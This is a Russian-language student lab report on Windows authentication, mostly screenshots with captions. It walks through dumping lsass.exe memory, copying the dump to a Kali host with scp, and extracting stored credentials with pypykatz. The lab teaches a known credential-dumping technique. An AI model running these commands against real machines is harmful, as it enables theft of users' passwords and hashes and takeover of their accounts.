# Практическая работа №3 ААА в Windows ## Часть 1. Анализ памяти Lsass.exe ### Вход в win10 от имени пользователя Petr ![](https://i.imgur.com/1TiW3LK.png) ### 1.10 Откроем подробное представление, перейдём в подробности и найдём процесс lsass.exe ![](https://i.imgur.com/Smogrul.png) ![](https://i.imgur.com/Yexr4YX.png) ### 1.12 Дамп создан. Запомним его расположение ![](https://i.imgur.com/yGo2aGm.png) ### 1.15 Включим сервис ssh(sudo –i.)(systemctl start ssh) ![](https://i.imgur.com/Uz5JWwR.png) ### Вход в командную строку как и в панель задач от имени администратора ![](https://i.imgur.com/W8l2ECb.png) ### scp C:\\Users\\ADMpetr\\AppData\\Local\\Temp\\lsass.DMP kali@192.168.10.9:/home/kali(передача файла) ![](https://i.imgur.com/Z56Lfpm.png) ### 1.21 Увидим учетные данные, которые скрипт достал из процесса lsass(pypykatz lsa minidump /home/kali/lsass.DMP- применение скрипта) ![](https://i.imgur.com/3fUzbX9.png)